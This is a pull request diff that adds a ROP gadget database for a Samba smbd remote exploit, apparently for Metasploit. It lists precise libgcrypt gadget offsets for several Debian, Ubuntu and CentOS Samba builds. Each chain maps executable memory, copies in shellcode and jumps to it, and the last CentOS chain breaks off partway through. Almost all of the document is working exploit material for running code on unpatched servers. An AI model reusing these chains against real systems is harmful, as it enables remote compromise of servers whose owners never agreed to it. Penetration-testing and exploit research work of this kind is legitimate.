### PR TITLE
add meterpreter/command support to samba exploit using ROP

### DIFF
--- a/data/ropdb/samba.xml
+++ b/data/ropdb/samba.xml
@@ -1,0 +1,392 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+<rop>
+        <compatibility>
+            <target>Debian Squeeze / 2:3.5.6~dfsg-3squeeze6</target>
+	</compatibility>
+
+        <!--
+        dpkg -l|grep libgcrypt
+        ii  libgcrypt11                        1.4.5-2                      LGPL Crypto library - runtime library
+        b6977000-b69e8000 r-xp 00000000 08:01 160176     /usr/lib/libgcrypt.so.11.5.3
+        b69e8000-b69eb000 rw-p 00070000 08:01 160176     /usr/lib/libgcrypt.so.11.5.3
+        -->
+
+        <gadgets base="0">
+                <gadget offset="0x00004d44">pop ebx ; pop ebp ; ret</gadget>
+                <gadget offset="0x00071ad4">offset of .got.plt section</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x00063dbf">pop eax; ret</gadget>
+                <gadget offset="0x00071af4">mmap@got - 4</gadget>
+                <gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
+                <gadget offset="0x00009974">jmp eax</gadget>
+                <gadget offset="0x00004d41">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
+                <gadget value ="0x00000000">mmap arg : addr</gadget>
+                <gadget value ="0x00001000">mmap arg : size</gadget>
+                <gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+                <gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
+                <gadget value ="0xffffffff">mmap arg : filedes </gadget>
+                <gadget value ="0x00000000">mmap arg : off_t </gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget offset="0x0006a761">pop edx ; inc ebx ; ret</gadget>
+                <gadget offset="0x00073000">edx =  writable location, in GOT</gadget>
+                <gadget offset="0x0004159f">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; pop ebp ; ret ||  save EAX (mmaped addr) in GOT</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x0005d4c3">xchg eax, edx ; ret || edx = MMAPed addr, dst in memcpy</gadget>
+                <gadget offset="0x00060a1a">pop esi ; ret</gadget>
+                <gadget offset="0x0005c01b">pop ebp ; pop ecx ; ret || ecx = esp</gadget>
+                <gadget offset="0x0003da28">push esp ; and al, 0x0C ; call esi</gadget>
+                <gadget offset="0x00063dbf">pop eax ; ret</gadget>
+                <gadget value ="0x0000005c">eax = value to add to esp to point to shellcode</gadget>
+                <gadget offset="0x000538c4">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
+                <gadget value ="0x00000000">edi = junk to be skipped over</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x00055743">xchg eax, ebx ; ret ||  ebx = esp + XX == src in memcpy</gadget>
+                <gadget offset="0x00063dbf">pop eax; ret</gadget>
+                <gadget offset="0x00071b6c">memcpy@got - 4</gadget>
+                <gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x00055743">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
+                <!-- set ecx to same value than edx -->
+                <gadget offset="0x0006e61f">xchg eax, esi ; ret || save eax</gadget>
+                <gadget offset="0x00063dbf">pop eax; ret</gadget>
+                <gadget offset="0x00072ffc">saved mmaped addr - 4</gadget>
+                <gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = saved mmaped addr</gadget>
+                <gadget offset="0x0005c914"> xchg eax, ecx ; ret  ;  || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
+                <gadget offset="0x0006e61f"> xchg eax, esi ; ret  ; || restore eax</gadget>
+                <gadget offset="0x00060a1a">pop esi ; ret</gadget>
+                <gadget offset="0x00071ad4">esi = offset of .got.plt section</gadget>
+                <gadget offset="0x00008505">pop edi ; pop ebp **1** ; ret</gadget>
+                <gadget offset="0x00004d0c">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget> 
+                <gadget value ="0x00000000">junk for ebp **1** </gadget>
+                <gadget offset="0x0005b68a">pushad  ; ret || will ret on gadget (P) which was in edi</gadget>
+                <gadget value ="size">payload size</gadget>
+	</gadgets>
+
+
+
+
+</rop>
+<rop>
+	<compatibility>
+            <target>Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2</target>
+            <target>Ubuntu 11.10 / 2:3.5.11~dfsg-1ubuntu2</target>
+	</compatibility>
+
+        <!--
+        dpkg -l|grep libgcr
+        ii  libgcrypt11                        1.5.0-1                                 LGPL Crypto library - runtime library
+        b69e3000-b6a65000 r-xp 00000000 08:01 148828     /lib/i386-linux-gnu/libgcrypt.so.11.7.0
+        b6a65000-b6a66000 r**p 00081000 08:01 148828     /lib/i386-linux-gnu/libgcrypt.so.11.7.0
+        b6a66000-b6a68000 rw-p 00082000 08:01 148828     /lib/i386-linux-gnu/libgcrypt.so.11.7.0
+        -->
+
+        <gadgets base="0">
+                <gadget offset="0x000048ee">pop ebx ; ret</gadget>
+                <gadget offset="0x00082ff4">offset of .got.plt section</gadget>
+                <gadget offset="0x0006933f">pop eax; ret</gadget>
+                <gadget offset="0x000830a4">mmap@got - 4</gadget>
+                <gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
+                <gadget offset="0x00007d79">jmp eax</gadget>
+                <gadget offset="0x00005646">add esp, 0x1C;  ret || mmap ret, skip overt mmap arguments</gadget>
+                <gadget value ="0x00000000">mmap arg : addr</gadget>
+                <gadget value ="0x00001000">mmap arg : size</gadget>
+                <gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+                <gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
+                <gadget value ="0xffffffff">mmap arg : filedes </gadget>
+                <gadget value ="0x00000000">mmap arg : off_t </gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget offset="0x0006fe61">pop edx ; inc ebx ; ret</gadget>
+                <gadget offset="0x00084000">edx =  writable location, in GOT</gadget>
+                <gadget offset="0x00046dcd">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; ret ||  save EAX (mmaped addr) in GOT</gadget>
+                <gadget offset="0x00008532">xchg eax, ecx ; ret ||  ecx = MMAPed addr, dst in memcpy</gadget>
+                <gadget offset="0x000438ad">mov eax, ecx ; pop ebp ; ret</gadget>
+                <gadget value ="0x00000000">junk for ebp</gadget>
+                <gadget offset="0x000056e8">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
+                <gadget offset="0x0006933f">pop eax ; ret</gadget>
+                <gadget offset="0x00084100">eax =  writable location, in GOT</gadget>
+                <gadget offset="0x000048ee">pop ebx ; ret</gadget>
+                <gadget offset="0x00084100">ebx =  writable location, in GOT</gadget>
+                <gadget offset="0x0004cccf">push esp ; add dword [eax], eax ; add byte [ebx+0x5E], bl ; pop edi ; pop ebp ; ret || edi = esp</gadget>
+                <gadget value ="0x00000000">junk for ebp</gadget>
+                <gadget offset="0x00020bad">mov eax, edi ; pop ebx ; pop esi ; pop edi ; ret</gadget>
+                <gadget value ="0x00000000">junk for ebx</gadget>
+                <gadget value ="0x00000048">esi = value to add to esp to point to shellcode</gadget>
+                <gadget value ="0x00000000">junk for edi</gadget>
+                <gadget offset="0x0001ffef">xchg eax, ebx ; ret</gadget>
+                <gadget offset="0x0000c39c">add ebx, esi ; ret || ebx = esp + XX == src in memcpy</gadget>
+                <gadget offset="0x0006933f">pop eax; ret</gadget>
+                <gadget offset="0x00083024">memcpy@got - 4</gadget>
+                <gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
+                <gadget offset="0x0001ffef">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
+                <gadget offset="0x00004803">pop esi ; ret</gadget>
+                <gadget offset="0x00082ff4">esi = offset of .got.plt section</gadget>
+                <gadget offset="0x00007af3">pop edi ; pop ebp **1** ; ret</gadget>
+                <gadget offset="0x000104c5">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget> 
+                <gadget value ="0x00000000">junk for ebp **1** </gadget>
+                <gadget offset="0x0001fdfa">pushad  ; ret || will ret on gadget (P) which was in edi</gadget>
+                <gadget value ="size">payload size</gadget>
+	</gadgets>
+</rop>
+<rop>
+	<compatibility>
+            <target>Ubuntu 11.04 / 2:3.5.8~dfsg-1ubuntu2</target>
+	</compatibility>
+
+        <!--
+        dpkg -l|grep libgcr
+        ii  libgcrypt11                        1.4.6-4ubuntu2                     LGPL Crypto library - runtime library
+        b69f8000-b6a69000 r-xp 00000000 08:01 17571      /lib/i386-linux-gnu/libgcrypt.so.11.6.0
+        b6a69000-b6a6a000 r**p 00070000 08:01 17571      /lib/i386-linux-gnu/libgcrypt.so.11.6.0
+        b6a6a000-b6a6c000 rw-p 00071000 08:01 17571      /lib/i386-linux-gnu/libgcrypt.so.11.6.0
+
+        we arrive on rop chain with pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
+        4 first pops are after pop esp
+        -->
+        <gadgets base="0">
+                <gadget offset="0x00071ff4">ebx = offset of .got.plt section</gadget>
+                <gadget value ="0x00000000">esi = junk to be skipped over</gadget>
+                <gadget value ="0x00000000">edi = junk to be skipped over</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x000641ff">pop eax; ret</gadget>
+                <gadget offset="0x00072010">mmap@got - 4</gadget>
+                <gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
+                <gadget offset="0x00007f19">jmp eax</gadget>
+                <gadget offset="0x000046b1">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
+                <gadget value ="0x00000000">mmap arg : addr</gadget>
+                <gadget value ="0x00001000">mmap arg : size</gadget>
+                <gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+                <gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
+                <gadget value ="0xffffffff">mmap arg : filedes </gadget>
+                <gadget value ="0x00000000">mmap arg : off_t </gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget offset="0x0006abc1">pop edx ; inc ebx ; ret</gadget>
+                <gadget offset="0x00073000">edx =  writable location, in GOT</gadget>
+                <gadget offset="0x00041b85">mov dword [edx], eax ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret || save EAX (mmaped addr) in GOT</gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget offset="0x0005822d">esi = pop ebx ; pop esi ; pop edi ; ret</gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget offset="0x0005d903">xchg eax, edx ; ret ||  edx = eax , after memcpy, ret on edx, ie mmaped addr</gadget>
+                <gadget offset="0x00043cd5">push esp ; and al, 0x08 ; mov dword [esp+0x04], 0x00000008 ; call esi || after call, esi = esp </gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget offset="0x00005c60">xchg eax, esi ; ret</gadget>
+                <gadget offset="0x0005c45c">pop ecx ; ret</gadget>
+                <gadget value ="0x0000005c">value to add to esp to point to shellcode</gadget>
+                <gadget offset="0x00053dc4">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
+                <gadget value ="0x00000000">edi = junk to be skipped over</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x0005c6e9">xchg eax, ebx ; ret || ebx = src in memcpy</gadget>
+                <gadget offset="0x000641ff">pop eax; ret</gadget>
+                <gadget offset="0x00072ffc">writable add in GOT - 4</gadget>
+                <gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = mmaped addr</gadget>
+                <gadget offset="0x0005cd54">xchg eax, ecx ; ret  ||  ecx = MMAPed addr, dst in memcpy</gadget>
+                <gadget offset="0x000641ff">pop eax; ret</gadget>
+                <gadget offset="0x0007204c">memcpy@got - 4</gadget>
+                <gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x0005c6e9">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
+                <gadget offset="0x00060e5a">pop esi ; ret</gadget>
+                <gadget offset="0x00071ff4">esi = offset of .got.plt section</gadget>
+                <gadget offset="0x00007d05">pop edi ; pop ebp **1** ; ret</gadget>
+                <gadget offset="0x0005822d">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget> 
+                <gadget value ="0x00000000">junk for ebp **1** </gadget>
+                <gadget offset="0x0005baca">pushad  ; ret || will ret on gadget (P) which was in edi</gadget>
+                <gadget value ="size">payload size</gadget>
+	</gadgets>
+    </rop>
+
+    <rop>
+        <compatibility>
+            <target>Ubuntu 10.10 / 2:3.5.4~dfsg-1ubuntu8</target>
+        </compatibility>
+
+        <!--
+        dpkg -l|grep libgcrypt
+        ii  libgcrypt11                        1.4.5-2ubuntu1                    LGPL Crypto library - runtime library
+        b6a20000-b6a91000 r-xp 00000000 08:01 17247      /lib/libgcrypt.so.11.5.3
+        b6a91000-b6a92000 r**p 00070000 08:01 17247      /lib/libgcrypt.so.11.5.3
+        b6a92000-b6a94000 rw-p 00071000 08:01 17247      /lib/libgcrypt.so.11.5.3
+        -->
+
+        <gadgets base="0">
+                <gadget offset="0x00004634">pop ebx ; pop ebp ; ret</gadget>
+                <gadget offset="0x00071ff4">offset of .got.plt section</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x0006421f">pop eax; ret</gadget>
+                <gadget offset="0x00072010">mmap@got - 4</gadget>
+                <gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
+                <gadget offset="0x0000922c">jmp eax</gadget>
+                <gadget offset="0x00004631">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
+                <gadget value ="0x00000000">mmap arg : addr</gadget>
+                <gadget value ="0x00001000">mmap arg : size</gadget>
+                <gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+                <gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
+                <gadget value ="0xffffffff">mmap arg : filedes </gadget>
+                <gadget value ="0x00000000">mmap arg : off_t </gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget offset="0x0006abc1">pop edx ; inc ebx ; ret</gadget>
+                <gadget offset="0x00073000">edx =  writable location, in GOT</gadget>
+                <gadget offset="0x000417af">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; pop ebp ; ret ||  save EAX (mmaped addr) in GOT</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x0005d923">xchg eax, edx ; ret || edx = MMAPed addr, dst in memcpy</gadget>
+                <gadget offset="0x00060e7a">pop esi ; ret</gadget>
+                <gadget offset="0x0005c47b">pop ebp ; pop ecx ; ret || ecx = esp</gadget>
+                <gadget offset="0x0003dbd8">push esp ; and al, 0x0C ; call esi</gadget>
+                <gadget offset="0x0006421f">pop eax ; ret</gadget>
+                <gadget value ="0x0000005c">eax = value to add to esp to point to shellcode</gadget>
+                <gadget offset="0x00053c64">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
+                <gadget value ="0x00000000">edi = junk to be skipped over</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x00043999">xchg eax, ebx ; ret ||  ebx = esp + XX == src in memcpy</gadget>
+                <gadget offset="0x0006421f">pop eax; ret</gadget>
+                <gadget offset="0x00072094">memcpy@got - 4</gadget>
+                <gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x00043999">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
+                <!-- set ecx to same value than edx -->
+                <gadget offset="0x0006ea7f">xchg eax, esi ; ret || save eax</gadget>
+                <gadget offset="0x0006421f">pop eax; ret</gadget>
+                <gadget offset="0x00072ffc">saved mmaped addr - 4</gadget>
+                <gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = saved mmaped addr</gadget>
+                <gadget offset="0x0005cd74"> xchg eax, ecx ; ret  ;  || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
+                <gadget offset="0x0006ea7f"> xchg eax, esi ; ret  ; || restore eax</gadget>
+                <gadget offset="0x00060e7a">pop esi ; ret</gadget>
+                <gadget offset="0x00071ff4">esi = offset of .got.plt section</gadget>
+                <gadget offset="0x00007e05">pop edi ; pop ebp **1** ; ret</gadget>
+                <gadget offset="0x00058245">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget> 
+                <gadget value ="0x00000000">junk for ebp **1** </gadget>
+                <gadget offset="0x000128cc">pushad  ; ret || will ret on gadget (P) which was in edi</gadget>
+                <gadget value ="size">payload size</gadget>
+	</gadgets>
+
+
+    </rop>
+
+
+
+
+
+
+
+    <!-- ROP CHAIN for smbd 2:3.5.11~dfsg-1ubuntu2   
+
+	<compatibility>
+            <target>Ubuntu 11.10 / 2:3.5.11~dfsg-1ubuntu2</target>
+	</compatibility>
+
+        <gadgets base="0">
+                <gadget offset="0x0000f3b1">pop eax; ret</gadget>
+                <gadget offset="0x00991ff0">mmap64@got</gadget>
+                <gadget offset="0x002f3ea4">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
+                <gadget offset="0x008c8997">jmp eax</gadget>
+                <gadget offset="0x0009ee21">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
+                <gadget value ="0x00000000">mmap arg : addr</gadget>
+                <gadget value ="0x00001000">mmap arg : size</gadget>
+                <gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+                <gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
+                <gadget value ="0xffffffff">mmap arg : filedes </gadget>
+                <gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
+                <gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
+                <gadget offset="0x0034fbd2">pop edx ; ret</gadget>
+                <gadget offset="0x0099a000">edx =  writable location, in GOT</gadget>
+                <gadget offset="0x0034c2bc">mov dword [edx], eax ;  ret; ||  save EAX (mmaped addr) in GOT</gadget>
+                <gadget offset="0x001fc04c">mov ecx, eax; mov eax, ecx; ret  ||  ecx = MMAPed addr, dst in memcpy</gadget>
+                <gadget offset="0x000a1d24">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
+                <gadget offset="0x001e0d59">push esp ; pop ebx ; pop esi ; ret || ebx = esp</gadget>
+                <gadget value ="0x00000000">junk for esi</gadget>
+                <gadget offset="0x0036fd9a">pop ebp ; ret</gadget>
+                <gadget value ="0x00000034">value to add to esp to point to shellcode</gadget>
+                <gadget offset="0x001a73b2">add ebx, ebp ; ret   || ebx = src in memcpy</gadget>
+                <gadget offset="0x0008c5ac">pop eax; ret</gadget>
+                <gadget offset="0x00991904">memcpy@got</gadget>
+                <gadget offset="0x002f3ea4">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x001726b5">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
+                <gadget offset="0x006a3bba">pop edi ; pop ebp **1** ; ret</gadget>
+                <gadget offset="0x000b64ec">add esp, 0x4 ; pop esi ; pop edi ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
+                <gadget value ="0x00000000">junk for ebp **1** </gadget>
+                <gadget offset="0x0002ab2c">pushad, ret</gadget>
+                <gadget value ="size">payload size</gadget>
+        </gadgets>
+
+
+     ROP CHAIN for smbd 2:3.5.8~dfsg-1ubuntu2
+	<compatibility>
+            <target>Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2</target>
+        </compatibility>
+
+        <gadgets base="0">
+                <gadget offset="0x0000f445">pop eax; ret</gadget>
+                <gadget offset="0x008c1008">mmap64@got</gadget>
+                <gadget offset="0x00348bb7">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
+                <gadget offset="0x0009e8e4">jmp eax</gadget>
+                <gadget offset="0x0009db61">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
+                <gadget value ="0x00000000">mmap arg : addr</gadget>
+                <gadget value ="0x00001000">mmap arg : size</gadget>
+                <gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+                <gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
+                <gadget value ="0xffffffff">mmap arg : filedes </gadget>
+                <gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
+                <gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
+                <gadget offset="0x001f6142">pop edx ; ret</gadget>
+                <gadget offset="0x008c9000">edx =  writable location, in GOT</gadget>
+                <gadget offset="0x00347b8c">mov dword [edx], eax ; pop ebp ; ret; ||  save EAX (mmaped addr) in GOT</gadget>
+                <gadget value ="0x00000000">junk for ebp</gadget>
+                <gadget offset="0x0021d553">mov ecx, eax; mov eax, ecx; ret  ||  ecx = MMAPed addr, dst in memcpy</gadget>
+                <gadget offset="0x001b1fe0">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
+                <gadget offset="0x000e817f">push esp ; pop ebx ; pop ebp ; ret || ebx = esp</gadget>
+                <gadget value ="0x00000000">junk for ebp</gadget>
+                <gadget offset="0x0000cdea">xchg eax, ebx ; ret || eax = esp</gadget>
+                <gadget offset="0x00277540">pop ebp ; ret</gadget>
+                <gadget value ="0x0000003c">value to add to esp to point to shellcode</gadget>
+                <gadget offset="0x0011d3a6">add eax, ebp ; mov ebx, 0x81FFF807 ; ret </gadget>
+                <gadget offset="0x0000cdea">xchg eax, ebx ; ret || ebx = esp + XX == src in memcpy</gadget>
+                <gadget offset="0x0000f445">pop eax; ret</gadget>
+                <gadget offset="0x008c0964">memcpy@got</gadget>
+                <gadget offset="0x00348bb7">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x0000cdea">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
+                <gadget offset="0x0009ee99">pop edi ; pop ebp **1** ; ret</gadget>
+                <gadget offset="0x00148cc6">add esp, 0x4 ; pop esi ; pop ebp ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
+                <gadget value ="0x00000000">junk for ebp **1** </gadget>
+                <gadget offset="0x0000dbcf">pushad, ret</gadget>
+                <gadget value ="size">payload size</gadget>
+            </gadgets>
+        -->
+        <!-- ROP CHAIN for smbd 2:3.5.6~dfsg-3squeeze6 
+	<compatibility
+            <target>Debian Squeeze / 2:3.5.6~dfsg-3squeeze6</target>
+	</compatibility>
+        <gadgets base="0">
+                <gadget offset="0x00021cd9">pop eax; ret</gadget>
+                <gadget offset="0x008cf86c">mmap64@got</gadget>
+                <gadget offset="0x002fd4a7">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
+                <gadget offset="0x000234e5">jmp eax</gadget>
+                <gadget offset="0x000b0331">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
+                <gadget value ="0x00000000">mmap arg : addr</gadget>
+                <gadget value ="0x00001000">mmap arg : size</gadget>
+                <gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+                <gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
+                <gadget value ="0xffffffff">mmap arg : filedes </gadget>
+                <gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
+                <gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
+                <gadget offset="0x0001cf12">pop edx ; ret</gadget>
+                <gadget offset="0x008d6000">edx =  writable location, in GOT</gadget>
+                <gadget offset="0x00353f4c">mov dword [edx], eax ; pop ebp ; ret; ||  save EAX (mmaped addr) in GOT</gadget>
+                <gadget value ="0x00000000">junk for ebp</gadget>
+                <gadget offset="0x000b98e9">mov ecx, eax; mov eax, ecx; ret  ||  ecx = MMAPed addr, dst in memcpy</gadget>
+                <gadget offset="0x006bffd2">mov edx, ecx ; mov eax, edx ; pop ebp ; ret || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
+                <gadget value ="0x00000000">junk for ebp</gadget>
+                <gadget offset="0x003660e4">push esp ; pop ebx ; pop ebp ; ret || ebx = esp</gadget>
+                <gadget value ="0x00000000">junk for ebp</gadget>
+                <gadget offset="0x00394107">pop ebp ; ret</gadget>
+                <gadget value ="0x00000034">value to add to esp to point to shellcode</gadget>
+                <gadget offset="0x0017892d">add ebx, ebp ; ret   || ebx = src in memcpy</gadget>
+                <gadget offset="0x00021cd9">pop eax; ret</gadget>
+                <gadget offset="0x008cf1e8">memcpy@got</gadget>
+                <gadget offset="0x002fd4a7">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x0001f666">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
+                <gadget offset="0x000b9ac5">pop edi ; pop ebp **1** ; ret</gadget>
+                <gadget offset="0x0033e7ea">add esp, 0x4 ; pop esi ; pop ebp ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
+                <gadget value ="0x00000000">junk for ebp **1** </gadget>
+                <gadget offset="0x00020453">pushad, ret</gadget>
+                <gadget value ="size">payload size</gadget>
+            </gadgets>
+            -->
+</db>

--- a/data/ropdb/samba.xml
+++ b/data/ropdb/samba.xml
@@ -116,7 +116,7 @@
                 <gadget offset="0x0000c39c">add ebx, esi ; ret || ebx = esp + XX == src in memcpy</gadget>
                 <gadget offset="0x0006933f">pop eax; ret</gadget>
                 <gadget offset="0x00083024">memcpy@got - 4</gadget>
-                <gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
+                <gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
                 <gadget offset="0x0001ffef">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
                 <gadget offset="0x00004803">pop esi ; ret</gadget>
                 <gadget offset="0x00082ff4">esi = offset of .got.plt section</gadget>

--- a/data/ropdb/samba.xml
+++ b/data/ropdb/samba.xml
@@ -260,7 +260,51 @@
 
     </rop>
 
+    <rop>
+        <compatibility>
+            <target>3.5.10-0.107.el5 on CentOS 5</target>
+        </compatibility>
 
+        <!--
+        yum list |grep libgcrypt
+        libgcrypt.i386                           1.4.4-5.el5                   installed
+        02c63000-02ce1000 r-xp 00000000 fd:00 929390     /usr/lib/libgcrypt.so.11.5.2
+        02ce1000-02ce4000 rwxp 0007d000 fd:00 929390     /usr/lib/libgcrypt.so.11.5.2
+        section is writable and executable, we'll copy the shellcode over there instead of using mmap
+        -->
+
+        <gadgets base="0">
+                <gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget>
+                <gadget offset="0x0005e842">pop eax ; pop ebx ; pop esi ; pop edi ; ret || eax = ret eip from call esi, ebx = esp, esi = edi = junk</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x00028374">push esp ; and al, 0x08 ; mov dword [esp+0x04], 0x00000007 ; call esi</gadget>
+                <gadget value ="0x00000000">esi = junk to be skipped over</gadget>
+                <gadget value ="0x00000000">edi = junk to be skipped over</gadget>
+                <gadget offset="0x00062c29">xchg eax, ebx ; ret || eax = esp</gadget>
+                <gadget offset="0x0006299c">pop ecx ; ret</gadget>
+                <gadget value ="0x0000005c">value to add to esp to point to shellcode</gadget>
+                <gadget offset="0x0005a44d">add ecx, eax ; mov eax, ecx ; ret || eax = ecx = shellcode</gadget>
+                <gadget offset="0x0006f5a1">pop edx ; inc ebx ; ret || set edx = to dst in memcpy for ret after pushad</gadget>
+                <gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget>
+                <gadget offset="0x0006a73f">pop eax ; ret</gadget>
+                <gadget offset="0x0007effc">memcpy@got - 4</gadget>
+                <gadget offset="0x00015e47">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x00062c29">xchg eax, ebx ; ret || ebx = @memcpy</gadget>
+                <gadget offset="0x0001704e">mov eax, ecx ; ret || eax = ecx = src in memcpy</gadget>
+                <gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget>
+                <gadget offset="0x0007ef54">esi = offset of .got.plt section</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x0006299c">pop ecx ; ret</gadget>
+                <gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget>
+                <gadget offset="0x00007a2b">pop edi ; pop ebp ** 1 **; ret</gadget>
+                <gadget offset="0x00004276">(P) pop ebx ; pop esi ; pop ebp ; ret</gadget>
+                <gadget value ="0x00000000">junk for ebp **1**</gadget>
